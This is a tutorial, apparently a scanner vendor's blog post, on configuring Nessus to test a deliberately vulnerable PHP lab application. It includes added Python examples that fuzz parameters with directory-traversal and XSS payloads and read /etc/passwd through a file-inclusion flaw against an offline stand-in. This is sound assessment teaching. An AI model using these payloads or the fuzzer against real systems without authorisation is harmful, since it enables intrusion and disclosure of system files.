Tips For Using Nessus In Web Application Testing
While Nessus has traditionally been a network vulnerability scanner, it contains quite a bit of functionality that can be used to identify vulnerabilities in custom web applications. This is not to say that Nessus will replace your favorite web application testing tool (or methodology), but it does provide useful information that can be used as the foundation for web application assessments or to indicate that deeper testing is warranted.
As of Nessus v6, Nmap and Nikto integration and importing of Nmap results into Nessus is no longer supported. Customers are encouraged to continue using the native port scanning and web application scanning capabilities built into Nessus.
There are two different approaches to web application testing. The first is part of a larger so-called "blind" test, where you are given a range of IP addresses and asked to test the devices and systems within those ranges. A general scan of that space will usually test the web applications it finds only generically, not specifically for web vulnerabilities, so you first need to find and enumerate which web applications are running and then run targeted scans that specifically look for web vulnerabilities. The second form of testing is when you are given the URL, and typically credentials, to the web application and asked to test it specifically. Nessus can help with both of these tasks and provide valuable information that will help with your testing. Nessus covers some of the first steps of web application testing, such as identifying the web server software and technologies, detecting vulnerabilities in common/popular web application software and rudimentary CGI application testing. This post focuses on using Nessus for network-based testing, and describes several compliance-based checks that provide very thorough testing of web application environments, including scanning against the OWASP PHP security specifications and the Apache CIS Benchmarks.
Selecting a Target
To create a realistic testing environment, our target was set up to run Mutillidae version 1.2, a PHP application that was written to contain vulnerabilities. Mutillidae was written by "Irongeek" and contains vulnerabilities that specifically map to the OWASP Top Ten list. It contains many different types of vulnerabilities, including SQL injection, cross-site scripting (XSS) and information disclosure.
When tuning Nessus for web application testing, you can select the plugin families that are relevant to your test. This saves time and makes for a more efficient scan. However, for a more thorough scan, you can leave all plugin families enabled and let Nessus choose the best plugins. For this scan, I have enabled the following plugin families:
- CGI abuses - This plugin family checks for anything that is ‘CGI’ related, unless it is XSS (and only an XSS vulnerability), in which case it falls into the "CGI abuses : XSS" family. These checks use a combination of detection techniques, including checking the version of the application and testing for the actual vulnerability. The attacks include software detection, information disclosure, XSS, SQLi, LFI, RFI, overflows and more.
- CGI abuses : XSS - Specific CGI checks for reflective and persistent XSS vulnerabilities in common web applications.
- Database - Typically a web server will run a database that is used by various web applications.
- FTP - Web pages need to be updated, and FTP is a popular protocol used to allow your web developers to send files to the server.
- Gain a Shell Remotely - If you can obtain a shell on the remote web server, testing the application is somewhat moot.
- Gain root remotely - Same as above: if you can gain root, resolve this problem before the application is tested.
- General - Contains the operating system fingerprinting plugins, including ones that will identify the OS over HTTP. Identifying the underlying operating system is very important for web application testing, as it will determine the syntax of commands sent via injection (command and SQL) attacks.
- Remote file access- Includes checks for specific web server/application vulnerabilities that lead to remote file disclosure.
- Service detection - Contains checks for several different services, including detecting Apache running HTTPS, HTTP CONNECT proxy settings and other services that may host web applications.
- Web servers - Plugins in this family detect approximately 300 specific vulnerabilities in popular web servers, such as Apache, IIS and generic vulnerabilities associated with the HTTP protocol itself.
Configuring the Scan Policy
In the “Advanced” settings tab, go to the "Global variables settings" and enable the following options:
The "Enable CGI scanning" checkbox causes Nessus to search the web server for known CGI applications and associated vulnerabilities. "Enable experimental scripts" allows Nessus to test for vulnerabilities that use new techniques. The "Thorough tests (slow)" option expands your testing when it comes to web applications and allows the plugins to "try harder" on various tests. This enables more exhaustive SQL injection testing, and it reports more about the CGI applications it finds. By default, Nessus will only store and test the last 8 CGI applications found. With thorough testing enabled, Nessus will store and test up to 1024 CGI locations.
Next, select "Web mirroring" from the pull-down menu:
In the "Start page" field, enter the location of the web application that you wish to test. Nessus will detect several different web applications and enumerate common directories on the web server. However, it cannot know about all directory names, so by entering the directory to do web mirroring, we add it to the list of applications that will be tested by the CGI scanner and other plugins.
Next, select "Unknown CGI Argument Input Validation Tests (torturecgis)" from the pull-down menu:
Select the check box to send POST requests. This will expand the testing that Nessus can do beyond just GET requests. This is important for web application testing, as many vulnerabilities in a web application are only triggered by a POST request. Checking this option increases the time the scan takes to complete.
After scanning the web application with the above settings, I noticed several plugin results of interest. The first plugin that was triggered was 26194, "Web Server Uses Plain Text Authentication Forms":
Nessus finds three separate pages that transmit fields labeled "password" in clear text, as the application is not using SSL.
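To make the criterion behind that finding concrete, here is an added example (not Nessus plugin code, and not from the original post) that applies the same idea to a saved copy of a page: every form containing a password input is resolved to the URL it actually submits to, and the form is flagged when that URL is not https. The page URL, host name and HTML are constructed for the example and only resemble a Mutillidae-style login page.

```python
"""Flag login forms that would submit a password over plain HTTP.

Added example, not Nessus plugin code: it reproduces the idea behind the
"Web Server Uses Plain Text Authentication Forms" check on a saved copy of a
page, so it runs offline. The page URL and HTML below are constructed and
only resemble a Mutillidae-style login page.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _FormCollector(HTMLParser):
    """Collect every <form> with its action and the names of its password inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "password_fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["password_fields"].append(attrs.get("name") or "?")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def plaintext_password_forms(page_url, html):
    """Return (submit_url, password_field_names) for each form on `page_url`
    that would send a password unencrypted.

    The form posts to its resolved action URL (an empty action means the page
    itself), so the decision is made on the scheme of the submit URL, not on
    the scheme of the page that happens to display the form: an https page
    with a form posting to http:// is still a finding."""
    parser = _FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not form["password_fields"]:
            continue
        submit_url = urljoin(page_url, form["action"])
        if urlparse(submit_url).scheme.lower() != "https":
            findings.append((submit_url, form["password_fields"]))
    return findings


# Constructed sample: three forms, only the first of which is a finding.
SAMPLE_PAGE_URL = "http://target.example/mutillidae/index.php?page=login.php"
SAMPLE_HTML = """
<form action="index.php?page=login.php" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Login">
</form>
<form action="https://target.example/mutillidae/index.php?page=register.php" method="post">
  <input type="text" name="username">
  <input type="PASSWORD" name="password">
  <input type="password" name="confirm_password">
</form>
<form action="index.php?page=search.php" method="get">
  <input type="text" name="q">
</form>
"""

if __name__ == "__main__":
    for url, fields in plaintext_password_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f"password field(s) {fields} submitted in clear text to {url}")
```

Note that the second sample form is not flagged because it posts to https, even though the page serving it is plain http. A tester should still record that case separately: an on-path attacker who can rewrite the http page can change the form's action, so the login is only as safe as the channel the form itself arrived over.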
The next plugin is 10662, "Web mirroring", which attempts to mirror the remote web site based on the start page ("/mutillidae") that we provided:
The web mirroring finds not only additional directories ("/mutillidae/images/"), but several CGI applications as well. In a web application assessment, the tester would use the provided CGI values above to perform manual or automated testing to determine the security posture of the web application. Nessus can perform some of this testing for you with plugin 10672, "Unknown CGI Argument Input Validation Tests (torturecgis)":
The above plugin output identifies a couple of CGI scripts that have security problems, such as directory traversal and XSS. Nessus chose to test the "logout" function, which is vulnerable to both XSS and remote file disclosure. By changing the syntax of the request slightly we can turn this into a successful attack that reads the "/etc/passwd" file. Below we use the syntax "index.php?page=/etc/passwd" and successfully execute the attack:
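The three steps above (mirror the start page to find CGI entry points and their parameters, torture each parameter with traversal and XSS payloads, then turn a traversal hit into a file read) are shown below as one added example. It is not Nessus plugin code and not Mutillidae code: the target is an in-memory stand-in, constructed here, that copies only the behaviour the post describes (index.php includes the file named by its "page" parameter and echoes "msg" unescaped), so the whole thing runs offline. The host name, start page HTML and file contents are made up.

```python
"""Mirror a start page for CGI entry points, torture each parameter the way a
torturecgis-style check does, then confirm a traversal hit by reading a file.

Added example; not Nessus plugin code and not Mutillidae code. The target is
an in-memory stand-in (constructed below) that copies the behaviour the post
describes: index.php includes the file named by its "page" parameter and
echoes "msg" unescaped. Host names, HTML and file contents are made up.
"""
import posixpath
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse, urlunparse, parse_qsl, urlencode

# ---- constructed stand-in for the vulnerable application -------------------
WEB_ROOT = "/var/www/mutillidae"
FAKE_FILES = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    WEB_ROOT + "/login.php": "<h1>Login</h1>",
}

def fake_fetch(url):
    """Return the body the stand-in server would send for `url`."""
    parts = urlparse(url)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    if not parts.path.endswith("/index.php"):
        return "404 Not Found"
    page = params.get("page", "home.php")
    # Vulnerable include: absolute names are read as-is, relative ones are
    # resolved under the web root without stripping "../" (local file inclusion).
    path = page if page.startswith("/") else posixpath.normpath(WEB_ROOT + "/" + page)
    body = FAKE_FILES.get(path, "File not found: " + page)
    if "msg" in params:
        body += "<p>" + params["msg"] + "</p>"   # reflected without escaping (XSS)
    return body

# ---- step 1: mirror the start page and collect CGIs with their parameters ----
class _LinkCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.urls, self._form_inputs = [], None
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self.urls.append((attrs["href"], {}))
        elif tag == "form":
            self._form_inputs = {}
            self.urls.append((attrs.get("action") or "", self._form_inputs))
        elif tag == "input" and self._form_inputs is not None and attrs.get("name"):
            self._form_inputs[attrs["name"]] = attrs.get("value") or ""
    def handle_endtag(self, tag):
        if tag == "form":
            self._form_inputs = None

def mirror_cgis(start_url, html):
    """Return {script_url: {param: sample_value}} for same-host links and forms
    that carry parameters; parameters seen for the same script are merged."""
    collector = _LinkCollector()
    collector.feed(html)
    cgis = {}
    for href, form_inputs in collector.urls:
        full = urlparse(urljoin(start_url, href))
        if full.netloc != urlparse(start_url).netloc:
            continue                                  # stay on the target host
        params = dict(parse_qsl(full.query, keep_blank_values=True))
        params.update(form_inputs)
        if params:
            script = urlunparse(full._replace(query="", fragment=""))
            cgis.setdefault(script, {}).update(params)
    return cgis

# ---- step 2: torture each parameter -------------------------------------------
PAYLOADS = {
    "traversal": ["/etc/passwd", "../../../../../../etc/passwd"],
    "xss": ["<script>alert(1)</script>"],
}
SIGNATURES = {"traversal": "root:x:0:0", "xss": "<script>alert(1)</script>"}

def torture_cgi(fetch, script, params):
    """Replace one parameter at a time with each payload; report (kind, script,
    param) once per vulnerability class whose signature comes back in the body."""
    findings = []
    for name in params:
        for kind, payloads in PAYLOADS.items():
            for payload in payloads:
                probe = dict(params, **{name: payload})
                if SIGNATURES[kind] in fetch(script + "?" + urlencode(probe)):
                    findings.append((kind, script, name))
                    break
    return findings

# ---- step 3: turn a traversal finding into a file read ------------------------
def read_file(fetch, script, param, path):
    """The manual follow-up from the post: index.php?page=/etc/passwd."""
    return fetch(script + "?" + urlencode({param: path}))

# Constructed start page (not a real Mutillidae page).
START_URL = "http://target.example/mutillidae/index.php"
START_HTML = """
<a href="index.php?page=login.php">Login</a>
<a href="index.php?page=home.php&amp;msg=welcome">Home</a>
<a href="images/logo.png">Logo</a>
<a href="http://www.example.org/">Elsewhere</a>
<form action="index.php?page=search.php" method="get"><input name="q"></form>
"""

if __name__ == "__main__":
    for script, params in mirror_cgis(START_URL, START_HTML).items():
        for finding in torture_cgi(fake_fetch, script, params):
            print(finding)
    print(read_file(fake_fetch, START_URL, "page", "/etc/passwd"))
```

Two points carry over to real targets. Detection is by signature in the response body, so a file that does not contain "root:x:0:0" or an application that HTML-encodes the reflected value will not be reported, which is exactly why the post treats the plugin output as a starting point for manual verification. And the mirroring step only follows links and forms on the pages it can see, which is why supplying the application's start page matters: a directory that is never linked is never tortured.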
While Nessus is not specifically designed for application scanning, it can be a valuable aid in performing pre-deployment scans before bringing applications online. Nessus is a fast and efficient way to identify which applications are on the network and if they are vulnerable to common exploits. This helps to quickly identify applications that may need rudimentary security fixes before more detailed manual testing is performed. Nessus can automate the process of discovering applications and common software, discovering the versions running and checking to see if they are vulnerable. The CGI scanner does a good job of basic "fuzzing" of the parameters of the discovered CGI applications to uncover attacks such as XSS and remote file disclosure. Again, while Nessus does not replace your web application testing tool, or completely replace your web application testing methodology, it is a valuable tool in the web application assessment process, especially for blind testing of large environments with several web servers and multiple applications.